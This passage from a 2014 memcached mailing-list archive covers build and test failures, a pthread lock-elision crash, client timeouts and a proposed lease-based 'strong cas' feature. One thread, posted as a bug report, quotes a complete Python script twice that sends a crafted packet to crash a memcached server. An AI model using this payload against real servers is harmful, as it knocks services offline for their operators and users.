 the way, on Linux 12.0.4.4 LTS.

 Slab Stats 64
 Thread stats 200
 Global stats 208
 Settings 124
 Item (no cas) 32
 Item (cas) 40
 Libevent thread 100
 Connection 340
 
 libevent thread cumulative 13100
 Thread stats cumulative 13000
 ./testapp
 1..48
 ok 1 - cache_create
 ok 2 - cache_constructor
 ok 3 - cache_constructor_fail
 ok 4 - cache_destructor
 ok 5 - cache_reuse
 ok 6 - cache_redzone
 ok 7 - issue_161
 ok 8 - strtol
 ok 9 - strtoll
 ok 10 - strtoul
 ok 11 - strtoull
 ok 12 - issue_44
 ok 13 - vperror
 ok 14 - issue_101
 ok 15 - start_server
 ok 16 - issue_92
 ok 17 - issue_102
 ok 18 - binary_noop
 ok 19 - binary_quit
 ok 20 - binary_quitq
 ok 21 - binary_set
 ok 22 - binary_setq
 ok 23 - binary_add
 ok 24 - binary_addq
 ok 25 - binary_replace
 ok 26 - binary_replaceq
 ok 27 - binary_delete
 ok 28 - binary_deleteq
 ok 29 - binary_get
 ok 30 - binary_getq
 ok 31 - binary_getk
 ok 32 - binary_getkq
 ok 33 - binary_incr
 ok 34 - binary_incrq
 ok 35 - binary_decr
 ok 36 - binary_decrq
 ok 37 - binary_version
 ok 38 - binary_flush
 ok 39 - binary_flushq
 ok 40 - binary_append
 ok 41 - binary_appendq
 ok 42 - binary_prepend
 ok 43 - binary_prependq
 ok 44 - binary_stat
 ok 45 - binary_illegal
 ok 46 - binary_pipeline_hickup
 SIGINT handled.
 ok 47 - shutdown
 ok 48 - stop_server
 prove ./t
 t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known
 failed to listen on TCP port 38181: Success
 t/00-startup.t ... 13/18 slab class   1: chunk size        80 perslab   
 13107
 slab class   2: chunk size       104 perslab   10082
 slab class   3: chunk size       136 perslab    7710
 slab class   4: chunk size       176 perslab    5957
 slab class   5: chunk size       224 perslab    4681
 slab class   6: chunk size       280 perslab    3744
 slab class   7: chunk size       352 perslab    2978
 slab class   8: chunk size       440 perslab    2383
 slab class   9: chunk size       552 perslab    1899
 slab class  10: chunk size       696 perslab    1506
 slab class  11: chunk size       872 perslab    1202
 slab class  12: chunk size      1096 perslab     956
 slab class  13: chunk size      1376 perslab     762
 slab class  14: chunk size      1720 perslab     609
 slab class  15: chunk size      2152 perslab     487
 slab class  16: chunk size      2696 perslab     388
 slab class  17: chunk size      3376 perslab     310
 slab class  18: chunk size      4224 perslab     248
 slab class  19: chunk size      5280 perslab     198
 slab class  20: chunk size      6600 perslab     158
 slab class  21: chunk size      8256 perslab     127
 slab class  22: chunk size     10320 perslab     101
 slab class  23: chunk size     12904 perslab      81
 slab class  24: chunk size     16136 perslab      64
 slab class  25: chunk size     20176 perslab      51
 slab class  26: chunk size     25224 perslab      41
 slab class  27: chunk size     31536 perslab      33
 slab class  28: chunk size     39424 perslab      26
 slab class  29: chunk size     49280 perslab      21
 slab class  30: chunk size     61600 perslab      17
 slab class  31: chunk size     77000 perslab      13
 slab class  32: chunk size     96256 perslab      10
 slab class  33: chunk size    120320 perslab       8
 slab class  34: chunk size    150400 perslab       6
 slab class  35: chunk size    188000 perslab       5
 slab class  36: chunk size    235000 perslab       4
 slab class  37: chunk size    293752 perslab       3
 slab class  38: chunk size    367192 perslab       2
 slab class  39: chunk size    458992 perslab       2
 slab class  40: chunk size    573744 perslab       1
 slab class  41: chunk size    717184 perslab       1
 slab class  42: chunk size   1048576 perslab       1
 26 server listening (auto-negotiate)
 27 server listening (auto-negotiate)
 28 send buffer was 180224, now 268435456
 32 send buffer was 180224, now 268435456
 31 server listening (udp)
 35 server listening (udp)
 30 server listening (udp)
 34 server listening (udp)
 29 server listening (udp)
 33 server listening (udp)
 28 server listening (udp)
 32 server listening (udp)
 slab class   1: chunk size        80 perslab   13107
 slab class   2: chunk size       104 perslab   10082
 slab class   3: chunk size       136 perslab    7710
 slab class   4: chunk size       176 perslab    5957
 slab class   5: chunk size       224 perslab    4681
 slab class   6: chunk size       280 perslab    3744
 slab class   7: chunk size       352 perslab    2978
 slab class   8: chunk size       440 perslab    2383
 slab 

Re: Memcached 1.4.19 Build Not Working - Compiling from Source

2014-05-01 Thread dormando
I don't know. I need to see the output of that program.

On Thu, 1 May 2014, Wilfred Khalik wrote:

 By the way, how much RAM is enough RAM?

 On Friday, May 2, 2014 1:28:57 PM UTC+12, Dormando wrote:
   What's the output of:

   $ prove -v t/lru-crawler.t

   How long are the tests taking to run? This has definitely been tested on
   ubuntu 12.04 (which is what I assume you meant?), but not something with
   so little RAM.

   On Thu, 1 May 2014, Wilfred Khalik wrote:

Hi guys,
   
I get the below failure error when I run the make test command:
   
Any help would be appreciated. I am running this on a 512MB Digital 
 Ocean VPS by the way, on Linux 12.0.4.4 LTS.
   
Slab Stats 64
Thread stats 200
Global stats 208
Settings 124
Item (no cas) 32
Item (cas) 40
Libevent thread 100
Connection 340

libevent thread cumulative 13100
Thread stats cumulative 13000
./testapp
1..48
ok 1 - cache_create
ok 2 - cache_constructor
ok 3 - cache_constructor_fail
ok 4 - cache_destructor
ok 5 - cache_reuse
ok 6 - cache_redzone
ok 7 - issue_161
ok 8 - strtol
ok 9 - strtoll
ok 10 - strtoul
ok 11 - strtoull
ok 12 - issue_44
ok 13 - vperror
ok 14 - issue_101
ok 15 - start_server
ok 16 - issue_92
ok 17 - issue_102
ok 18 - binary_noop
ok 19 - binary_quit
ok 20 - binary_quitq
ok 21 - binary_set
ok 22 - binary_setq
ok 23 - binary_add
ok 24 - binary_addq
ok 25 - binary_replace
ok 26 - binary_replaceq
ok 27 - binary_delete
ok 28 - binary_deleteq
ok 29 - binary_get
ok 30 - binary_getq
ok 31 - binary_getk
ok 32 - binary_getkq
ok 33 - binary_incr
ok 34 - binary_incrq
ok 35 - binary_decr
ok 36 - binary_decrq
ok 37 - binary_version
ok 38 - binary_flush
ok 39 - binary_flushq
ok 40 - binary_append
ok 41 - binary_appendq
ok 42 - binary_prepend
ok 43 - binary_prependq
ok 44 - binary_stat
ok 45 - binary_illegal
ok 46 - binary_pipeline_hickup
SIGINT handled.
ok 47 - shutdown
ok 48 - stop_server
prove ./t
t/00-startup.t ... 1/18 getaddrinfo(): Name or service not known
failed to listen on TCP port 38181: Success
t/00-startup.t ... 13/18 slab class   1: chunk size        80 
 perslab   13107
slab class   2: chunk size       104 perslab   10082
slab class   3: chunk size       136 perslab    7710
slab class   4: chunk size       176 perslab    5957
slab class   5: chunk size       224 perslab    4681
slab class   6: chunk size       280 perslab    3744
slab class   7: chunk size       352 perslab    2978
slab class   8: chunk size       440 perslab    2383
slab class   9: chunk size       552 perslab    1899
slab class  10: chunk size       696 perslab    1506
slab class  11: chunk size       872 perslab    1202
slab class  12: chunk size      1096 perslab     956
slab class  13: chunk size      1376 perslab     762
slab class  14: chunk size      1720 perslab     609
slab class  15: chunk size      2152 perslab     487
slab class  16: chunk size      2696 perslab     388
slab class  17: chunk size      3376 perslab     310
slab class  18: chunk size      4224 perslab     248
slab class  19: chunk size      5280 perslab     198
slab class  20: chunk size      6600 perslab     158
slab class  21: chunk size      8256 perslab     127
slab class  22: chunk size     10320 perslab     101
slab class  23: chunk size     12904 perslab      81
slab class  24: chunk size     16136 perslab      64
slab class  25: chunk size     20176 perslab      51
slab class  26: chunk size     25224 perslab      41
slab class  27: chunk size     31536 perslab      33
slab class  28: chunk size     39424 perslab      26
slab class  29: chunk size     49280 perslab      21
slab class  30: chunk size     61600 perslab      17
slab class  31: chunk size     77000 perslab      13
slab class  32: chunk size     96256 perslab      10
slab class  33: chunk size    120320 perslab       8
slab class  34: chunk size    150400 perslab       6
slab class  35: chunk size    188000 perslab       5
slab class  36: chunk size    235000 perslab       4
slab class  37: chunk size    293752 perslab       3
slab class  38: chunk size    367192 perslab       2
slab class  39: chunk

Re: Java memcached timeout

2014-04-25 Thread dormando
http://memcached.org/timeouts

also, you haven't said what version you're on of memcached? or provided
stats, or etc...

On Fri, 25 Apr 2014, Filippe Costa Spolti wrote:

 Helle guys,

 Anyone already had a problem similar to this:

 Caused by: java.util.concurrent.ExecutionException: 
 net.spy.memcached.internal.CheckedOperationTimeoutException: Operation timed 
 out. - failing
 node: localhost/127.0.0.1:11211
     at 
 net.spy.memcached.internal.OperationFuture.get(OperationFuture.java:106) 
 [spymemcached-2.8.1.jar:2.8.1]
     at net.spy.memcached.internal.GetFuture.get(GetFuture.java:62) 
 [spymemcached-2.8.1.jar:2.8.1]
     at net.spy.memcached.MemcachedClient.get(MemcachedClient.java:997) 
 [spymemcached-2.8.1.jar:2.8.1]
     ... 80 more
 Caused by: net.spy.memcached.internal.CheckedOperationTimeoutException: 
 Operation timed out. - failing node: localhost/127.0.0.1:11211

 ?

 it's happening everyday here..

 A new version can fix it?

 --
 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself






Re: Memcached vulnerabilitie

2014-04-23 Thread dormando
what version are you testing?

On Wed, 23 Apr 2014, Filippe Costa Spolti wrote:

 Hello everyone.
 This python script crashes memcached.

 import sys
 import socket

 print "Memcached Remote DoS - Bursting Clouds yo!"
 if len(sys.argv) != 3:
     print "Usage: %s <host> <port>" % (sys.argv[0])
     sys.exit(1)

 target = sys.argv[1]
 port = sys.argv[2]

 print "[+] Target Host: %s" % (target)
 print "[+] Target Port: %s" % (port)

 kill = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"
 kill += "\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 kill += "\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea"

 hax = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
     hax.connect((target, int(port)))
     print "[+] Connected, firing payload!"
 except:
     print "[-] Connection Failed... Is there even a target?"
     sys.exit(1)
 try:
     hax.send(kill)
     print "[+] Payload Sent!"
 except:
     print "[-] Payload Sending Failure... WTF?"
     sys.exit(1)
 hax.close()
 print "[*] Should be dead..."

 --
 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself






Re: Memcached vulnerabilitie

2014-04-23 Thread dormando
can you... try against a version that isn't four years old?

we patched something similar to this a while back.

On Wed, 23 Apr 2014, Filippe Costa Spolti wrote:

 memcached 1.4.4



 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself
 On 04/23/2014 06:24 PM, dormando wrote:

 what version are you testing?

 On Wed, 23 Apr 2014, Filippe Costa Spolti wrote:

 Hello everyone.
 This python script crashes memcached.

 import sys
 import socket

 print "Memcached Remote DoS - Bursting Clouds yo!"
 if len(sys.argv) != 3:
     print "Usage: %s <host> <port>" % (sys.argv[0])
     sys.exit(1)

 target = sys.argv[1]
 port = sys.argv[2]

 print "[+] Target Host: %s" % (target)
 print "[+] Target Port: %s" % (port)

 kill = "\x80\x12\x00\x01\x08\x00\x00\x00\xff\xff\xff"
 kill += "\xe8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
 kill += "\x00\xff\xff\xff\xff\x01\x00\x00\0xabad1dea"

 hax = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 try:
     hax.connect((target, int(port)))
     print "[+] Connected, firing payload!"
 except:
     print "[-] Connection Failed... Is there even a target?"
     sys.exit(1)
 try:
     hax.send(kill)
     print "[+] Payload Sent!"
 except:
     print "[-] Payload Sending Failure... WTF?"
     sys.exit(1)
 hax.close()
 print "[*] Should be dead..."

 --
 Regards,
 __
 Filippe Costa Spolti
 Linux User n°515639 - http://counter.li.org/
 filippespo...@gmail.com
 Be yourself









Re: Add a feature 'strong cas', developed from 'lease' that mentioned in Facebook's paper

2014-04-20 Thread dormando
Well I haven't read the lease paper yet. Ryan, can folks more familiar
with the actual implementation have a look through it maybe?

On Thu, 17 Apr 2014, Zhiwei Chan wrote:


 I'm working on a trading system, and getting stale data is unacceptable
 most of the time. But the high throughput makes it impossible to get all
 data from mysql. So I want to make it more reliable when using memcached
 as a cache. Facebook's paper "Scaling Memcache at Facebook" mentions
 methods called 'lease' and 'mcsqueal', but mcsqueal is difficult for my
 case, because it is hard to derive the cache key on the mysql side.

 Adding the 'strong cas' feature is meant to solve the following typical
 problem: client A and client B both want to update the same key, and A
 (set key=1) updates the database before B (set key=2):
 key not in cache: (A get-miss) - (B get-miss) - (B set key=2) - (A set key=1);
 or key in cache: (A delete key) - (B delete key) - (B set key=2) - (A set key=1);
 Something is wrong! key=2 is in the database but key=1 is in the cache.

 This can happen in a highly concurrent system, and I don't see a way to
 solve it with the current cas method. So I added two commands, 'getss'
 and 'deletess': they create a lease and return a cas-unique, or tell the
 client a lease already exists on the server, so the client can do
 something to prevent stale data, such as wait, or invalidate the prior
 lease. I also think of the lease as a kind of 'dirty lock': anybody who
 tries to update the key replaces its own expiration with the lease's
 expiration (the lease's expiration time should be very short), so in the
 worst case (low probability) stale data only exists in the cache for a
 short time. That is acceptable for most apps in my case.

 For more detail, please read doc/strongcas.txt. Hoping for your
 suggestions ~_~

  i have created a pull request on github.
 https://github.com/memcached/memcached/pull/65
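
To make the proposed flow concrete, a hedged client-side sketch of the
lease idea (mc_getss and mc_set_with_cas are hypothetical stand-ins for
the getss/deletess verbs, not a real client API):

    #include <stdbool.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <string.h>

    /* Hypothetical stubs standing in for the proposed commands and a DB. */
    static bool mc_getss(const char *key, char *val, size_t len, uint64_t *cas) {
        (void)key; (void)val; (void)len;
        *cas = 42;        /* pretend: miss, and the server granted lease 42 */
        return false;     /* false == miss */
    }

    static bool mc_set_with_cas(const char *key, const char *val, uint64_t cas) {
        /* the server accepts the fill only while the lease token is valid */
        printf("fill %s=%s under lease %llu\n", key, val, (unsigned long long)cas);
        return true;
    }

    int main(void) {
        char val[64];
        uint64_t lease;
        if (!mc_getss("price:acme", val, sizeof(val), &lease)) {
            /* Miss: we hold the lease, so read the DB and fill under the
             * token. A concurrent deletess invalidates the lease, so a
             * stale, late-arriving fill is rejected instead of winning. */
            strcpy(val, "100");          /* stand-in for the DB read */
            mc_set_with_cas("price:acme", val, lease);
        }
        return 0;
    }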






Re: 1.4.18

2014-04-19 Thread dormando
Well, that learns me for trying to write software without the 10+ VM
buildbots...

The i386 one, can you include the output of stats settings, and also
manually run: lru_crawler enable (or start with -o lru_crawler) then run
stats settings again please? Really weird that it fails there, but not
the lines before it looking for the OK while enabling it.

On the 64bit host, can you try increasing the sleep on t/lru-crawler.t:39
from 3 to 8 and try again? I was trying to be clever but that may not be
working out.

Thanks! At least there're still people trying to maintain it for some
distros...

 On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote:
   http://code.google.com/p/memcached/wiki/ReleaseNotes1418


 I just tried building the Arch Linux package for this and got failures when 
 running the test suite. This was the output from the 32-bit i686 build;
 I saw the same results building for x86_64. Let me know what other relevant 
 information might help.

 #   Failed test at t/lru-crawler.t line 45.
 #  got: undef
 # expected: 'yes'
 t/lru-crawler.t ..
 Failed 96/189 subtests
 t/lru.t .. ok
 t/maxconns.t . ok
 t/multiversioning.t .. ok
 t/noreply.t .. ok
 t/slabs_reassign.t ... ok
 t/stats-conns.t .. ok
 t/stats-detail.t . ok
 t/stats.t  ok
 t/touch.t  ok
 t/udp.t .. ok
 t/unixsocket.t ... ok
 t/whitespace.t ... skipped: Skipping tests probably because you don't 
 have git.

 Test Summary Report
 ---
 t/lru-crawler.t    (Wstat: 13 Tests: 94 Failed: 1)
   Failed test:  94
   Non-zero wait status: 13
   Parse errors: Bad plan.  You planned 189 tests but ran 94.
 Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr  0.05 sys +  2.27 cusr  
 0.35 csys =  3.43 CPU)
 Result: FAIL
 Makefile:1376: recipe for target 'test' failed
 make: *** [test] Error 1
 == ERROR: A failure occurred in check().
     Aborting...



 Running out of a git checkout on x86_64, I get slightly different results:

 t/item_size_max.t  ok
 t/line-lengths.t . ok
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'
 # Looks like you failed 2 tests of 189.
 t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200)
 Failed 2/189 subtests
 t/lru.t .. ok
 t/maxconns.t . ok
 t/multiversioning.t .. ok
 t/noreply.t .. ok
 t/slabs_reassign.t ... ok
 t/stats-conns.t .. ok
 t/stats-detail.t . ok
 t/stats.t  ok
 t/touch.t  ok
 t/udp.t .. ok
 t/unixsocket.t ... ok
 t/whitespace.t ... 1/120
 #   Failed test '0001-Support-V-version-option.patch (see 
 devtools/clean-whitespace.pl)'
 #   at t/whitespace.t line 40.
 t/whitespace.t ... 27/120 # Looks like you failed 1 test of 120.
 t/whitespace.t ... Dubious, test returned 1 (wstat 256, 0x100)
 Failed 1/120 subtests

 Test Summary Report
 ---
 t/lru-crawler.t    (Wstat: 512 Tests: 189 Failed: 2)
   Failed tests:  96-97
   Non-zero exit status: 2
 t/whitespace.t (Wstat: 256 Tests: 120 Failed: 1)
   Failed test:  1
   Non-zero exit status: 1
 Files=48, Tests=7193, 115 wallclock secs ( 1.39 usr  0.15 sys +  5.39 cusr  
 1.02 csys =  7.95 CPU)
 Result: FAIL
 Makefile:1482: recipe for target 'test' failed
 make: *** [test] Error 1

  
 $ git describe
 1.4.18

 $ uname -a
 Linux galway 3.14.1-1-ARCH #1 SMP PREEMPT Mon Apr 14 20:40:47 CEST 2014 
 x86_64 GNU/Linux

 $ gcc --version
 gcc (GCC) 4.8.2 20140206 (prerelease)
 Copyright (C) 2013 Free Software Foundation, Inc.
 This is free software; see the source for copying conditions.  There is NO
 warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.






Re: 1.4.18

2014-04-19 Thread dormando
 On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote:
   Well, that learns me for trying to write software without the 10+ VM
   buildbots...

   The i386 one, can you include the output of stats settings, and also
   manually run: lru_crawler enable (or start with -o lru_crawler) then 
 run
   stats settings again please? Really weird that it fails there, but not
   the lines before it looking for the OK while enabling it.


 As soon as I type lru_crawler enable, memcached crashes. I see this in 
 dmesg.

 [189571.108397] traps: memcached-debug[31776] general protection ip:f7749988 
 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000]
 [189969.840918] traps: memcached-debug[2600] general protection 
 ip:7f976510a1c8 sp:7f976254aed8 error:0 in 
 libpthread-2.19.so[7f97650f9000+18000]
 [195892.554754] traps: memcached-debug[31871] general protection ip:f76f0988 
 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000]

 Starting with -o lru_crawler also crashes.

 [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 
 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000]

 This is running both 32 bit and 64 bit executables on the same build box; 
 note in the above dmesg output that two of them appear to be from 32-bit
 processes, and we also see a crash in what looks a lot like a 64 bit pointer 
 address, if I'm reading this right...

Uhh... is your cross compile goofed?

Any chance you could start the memcached-debug binary under gdb and then
crash it the same way? Get a full stack trace.

Thinking if I even have a 32bit host left somewhere to test with... will
have to spin up the VM's later, but a stacktrace might be enlightening
anyway.

Thanks!


   On the 64bit host, can you try increasing the sleep on 
 t/lru-crawler.t:39
   from 3 to 8 and try again? I was trying to be clever but that may not be
   working out.


 Didn't change anything, same two failures with the same output listed.

I feel like something's a bit different between your two tests. In the
first set, it's definitely not crashing for the 64bit test, but not
working either. Is something weird going on with the second set of tests?
You noted it seems to be running a 32bit binary still.


   Thanks! At least there're still people trying to maintain it for some
   distros...

On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote:
      http://code.google.com/p/memcached/wiki/ReleaseNotes1418
   
   
I just tried building the Arch Linux package for this and got 
 failures when running the test suite. This was the output from the
   32-bit i686 build;
I saw the same results building for x86_64. Let me know what other 
 relevant information might help.
   
#   Failed test at t/lru-crawler.t line 45.
#  got: undef
# expected: 'yes'
t/lru-crawler.t ..
Failed 96/189 subtests
t/lru.t .. ok
t/maxconns.t . ok
t/multiversioning.t .. ok
t/noreply.t .. ok
t/slabs_reassign.t ... ok
t/stats-conns.t .. ok
t/stats-detail.t . ok
t/stats.t  ok
t/touch.t  ok
t/udp.t .. ok
t/unixsocket.t ... ok
t/whitespace.t ... skipped: Skipping tests probably because you 
 don't have git.
   
Test Summary Report
---
t/lru-crawler.t    (Wstat: 13 Tests: 94 Failed: 1)
  Failed test:  94
  Non-zero wait status: 13
  Parse errors: Bad plan.  You planned 189 tests but ran 94.
Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr  0.05 sys +  2.27 
 cusr  0.35 csys =  3.43 CPU)
Result: FAIL
Makefile:1376: recipe for target 'test' failed
make: *** [test] Error 1
== ERROR: A failure occurred in check().
    Aborting...
   
   
   
Running out of a git checkout on x86_64, I get slightly different 
 results:
   
t/item_size_max.t  ok
t/line-lengths.t . ok
t/lru-crawler.t .. 93/189
#   Failed test 'slab1 now has 60 used chunks'
#   at t/lru-crawler.t line 57.
#  got: '90'
# expected: '60'
   
#   Failed test 'slab1 has 30 reclaims'
#   at t/lru-crawler.t line 59.
#  got: '0'
# expected: '30'
# Looks like you failed 2 tests of 189.
t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200)
Failed 2/189 subtests
t/lru.t .. ok
t/maxconns.t . ok
t/multiversioning.t .. ok
t/noreply.t .. ok
t/slabs_reassign.t ... ok
t/stats-conns.t .. ok
t/stats-detail.t . ok
t/stats.t  ok
t/touch.t  ok

Re: 1.4.18

2014-04-19 Thread dormando
Er... reading comprehension fail. I meant 64bit binary still at the
bottom there.

On Sat, 19 Apr 2014, dormando wrote:

  On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote:
Well, that learns me for trying to write software without the 10+ VM
buildbots...
 
The i386 one, can you include the output of stats settings, and also
manually run: lru_crawler enable (or start with -o lru_crawler) 
  then run
stats settings again please? Really weird that it fails there, but 
  not
the lines before it looking for the OK while enabling it.
 
 
  As soon as I type lru_crawler enable, memcached crashes. I see this in 
  dmesg.
 
  [189571.108397] traps: memcached-debug[31776] general protection 
  ip:f7749988 sp:f47ff2d8 error:0 in libpthread-2.19.so[f7739000+18000]
  [189969.840918] traps: memcached-debug[2600] general protection 
  ip:7f976510a1c8 sp:7f976254aed8 error:0 in 
  libpthread-2.19.so[7f97650f9000+18000]
  [195892.554754] traps: memcached-debug[31871] general protection 
  ip:f76f0988 sp:f46ff2d8 error:0 in libpthread-2.19.so[f76e+18000]
 
  Starting with -o lru_crawler also crashes.
 
  [195977.276379] traps: memcached-debug[2182] general protection ip:f7738988 
  sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000]
 
  This is running both 32 bit and 64 bit executables on the same build box; 
  note in the above dmesg output that two of them appear to be from 32-bit
  processes, and we also see a crash in what looks a lot like a 64 bit 
  pointer address, if I'm reading this right...

 Uhh... is your cross compile goofed?

 Any chance you could start the memcached-debug binary under gdb and then
 crash it the same way? Get a full stack trace.

 Thinking if I even have a 32bit host left somewhere to test with... will
 have to spin up the VM's later, but a stacktrace might be enlightening
 anyway.

 Thanks!

 
On the 64bit host, can you try increasing the sleep on 
  t/lru-crawler.t:39
from 3 to 8 and try again? I was trying to be clever but that may not 
  be
working out.
 
 
  Didn't change anything, same two failures with the same output listed.

 I feel like something's a bit different between your two tests. In the
 first set, it's definitely not crashing for the 64bit test, but not
 working either. Is something weird going on with the second set of tests?
 You noted it seems to be running a 32bit binary still.

 
Thanks! At least there're still people trying to maintain it for some
distros...
 
 On Thursday, April 17, 2014 6:28:24 PM UTC-5, Dormando wrote:
       http://code.google.com/p/memcached/wiki/ReleaseNotes1418


 I just tried building the Arch Linux package for this and got 
  failures when running the test suite. This was the output from the
32-bit i686 build;
 I saw the same results building for x86_64. Let me know what other 
  relevant information might help.

 #   Failed test at t/lru-crawler.t line 45.
 #  got: undef
 # expected: 'yes'
 t/lru-crawler.t ..
 Failed 96/189 subtests
 t/lru.t .. ok
 t/maxconns.t . ok
 t/multiversioning.t .. ok
 t/noreply.t .. ok
 t/slabs_reassign.t ... ok
 t/stats-conns.t .. ok
 t/stats-detail.t . ok
 t/stats.t  ok
 t/touch.t  ok
 t/udp.t .. ok
 t/unixsocket.t ... ok
 t/whitespace.t ... skipped: Skipping tests probably because you 
  don't have git.

 Test Summary Report
 ---
 t/lru-crawler.t    (Wstat: 13 Tests: 94 Failed: 1)
   Failed test:  94
   Non-zero wait status: 13
   Parse errors: Bad plan.  You planned 189 tests but ran 94.
 Files=48, Tests=6982, 113 wallclock secs ( 0.76 usr  0.05 sys +  
  2.27 cusr  0.35 csys =  3.43 CPU)
 Result: FAIL
 Makefile:1376: recipe for target 'test' failed
 make: *** [test] Error 1
 == ERROR: A failure occurred in check().
     Aborting...



 Running out of a git checkout on x86_64, I get slightly different 
  results:

 t/item_size_max.t  ok
 t/line-lengths.t . ok
 t/lru-crawler.t .. 93/189
 #   Failed test 'slab1 now has 60 used chunks'
 #   at t/lru-crawler.t line 57.
 #  got: '90'
 # expected: '60'

 #   Failed test 'slab1 has 30 reclaims'
 #   at t/lru-crawler.t line 59.
 #  got: '0'
 # expected: '30'
 # Looks like you failed 2 tests of 189.
 t/lru-crawler.t .. Dubious, test returned 2 (wstat 512, 0x200)
 Failed 2/189 subtests
 t/lru.t .. ok
 t/maxconns.t

Re: 1.4.18

2014-04-19 Thread dormando
On Sat, 19 Apr 2014, Dan McGee wrote:

 On Sat, Apr 19, 2014 at 1:45 PM, dormando dorma...@rydia.net wrote:
On Sat, Apr 19, 2014 at 12:43 PM, dormando dorma...@rydia.net wrote:
      Well, that learns me for trying to write software without the 
 10+ VM
      buildbots...
   
      The i386 one, can you include the output of stats settings, 
 and also
      manually run: lru_crawler enable (or start with -o 
 lru_crawler) then run
      stats settings again please? Really weird that it fails 
 there, but not
      the lines before it looking for the OK while enabling it.
   
   
As soon as I type lru_crawler enable, memcached crashes. I see this 
 in dmesg.
   
[189571.108397] traps: memcached-debug[31776] general protection 
 ip:f7749988 sp:f47ff2d8 error:0 in
   libpthread-2.19.so[f7739000+18000]
[189969.840918] traps: memcached-debug[2600] general protection 
 ip:7f976510a1c8 sp:7f976254aed8 error:0 in
   libpthread-2.19.so[7f97650f9000+18000]
[195892.554754] traps: memcached-debug[31871] general protection 
 ip:f76f0988 sp:f46ff2d8 error:0 in
   libpthread-2.19.so[f76e+18000]
   
Starting with -o lru_crawler also crashes.
   
[195977.276379] traps: memcached-debug[2182] general protection 
 ip:f7738988 sp:f75782d8 error:0 in libpthread-2.19.so[f7728000+18000]
   
This is running both 32 bit and 64 bit executables on the same build 
 box; note in the above dmesg output that two of them appear to
   be from 32-bit
processes, and we also see a crash in what looks a lot like a 64 bit 
 pointer address, if I'm reading this right...

 Uhh... is your cross compile goofed?

 Any chance you could start the memcached-debug binary under gdb and then
 crash it the same way? Get a full stack trace.

 Thinking if I even have a 32bit host left somewhere to test with... will
 have to spin up the VM's later, but a stacktrace might be enlightening
 anyway.


 Program received signal SIGSEGV, Segmentation fault.
 [Switching to Thread 0xf7dbfb40 (LWP 7)]
 0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0
 (gdb) bt
 #0  0xf7f7f988 in __lll_unlock_elision () from /usr/lib/libpthread.so.0
 #1  0xf7f790e0 in __pthread_mutex_unlock_usercnt () from 
 /usr/lib/libpthread.so.0
 #2  0xf7f79bff in pthread_cond_wait@@GLIBC_2.3.2 () from 
 /usr/lib/libpthread.so.0
 #3  0x08061bfe in item_crawler_thread ()
 #4  0xf7f75f20 in start_thread () from /usr/lib/libpthread.so.0
 #5  0xf7ead94e in clone () from /usr/lib/libc.so.6

Holy crap lock elision. I have one machine with a haswell chip here, but
I'll have to USB boot. Is getting an Arch liveimage especially time
consuming?

https://github.com/dormando/memcached/tree/crawler_fix

Can you try this? The lock elision might've made my undefined behavior
mistake of not holding a lock before initially waiting on the condition
fatal.

A further fix might be required, as it's possible someone could kill the
do_etc flag before the thread fully starts and it'd drop out with the lock
held. That would be an incredible feat though.
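
For the curious, the bug class in a nutshell (a minimal sketch, not the
memcached source): POSIX requires the mutex to be held when calling
pthread_cond_wait(); waiting without it is undefined behavior, which lock
elision upgrades from "happens to work" to the __lll_unlock_elision crash
in the backtraces above.

    #include <pthread.h>
    #include <stdio.h>

    static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
    static pthread_cond_t  cond = PTHREAD_COND_INITIALIZER;
    static int do_run = 1;

    /* BUGGY shape: waiting without holding the mutex is undefined
     * behavior. (Left here for illustration; never called.) */
    static void *crawler_wrong(void *arg) {
        pthread_cond_wait(&cond, &lock);
        return arg;
    }

    /* Correct shape: lock first; pthread_cond_wait() atomically releases
     * the mutex while sleeping and re-acquires it before returning. */
    static void *crawler_right(void *arg) {
        pthread_mutex_lock(&lock);
        while (do_run)
            pthread_cond_wait(&cond, &lock);
        pthread_mutex_unlock(&lock);
        return arg;
    }

    int main(void) {
        pthread_t t;
        pthread_create(&t, NULL, crawler_right, NULL);
        pthread_mutex_lock(&lock);
        do_run = 0;                  /* tell the thread to exit... */
        pthread_cond_signal(&cond);  /* ...and wake it if it's waiting */
        pthread_mutex_unlock(&lock);
        pthread_join(t, NULL);
        (void)crawler_wrong;         /* not called; see comment above */
        puts("clean shutdown");
        return 0;
    }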
  

   Thanks!

   
      On the 64bit host, can you try increasing the sleep on 
 t/lru-crawler.t:39
      from 3 to 8 and try again? I was trying to be clever but that 
 may not be
      working out.
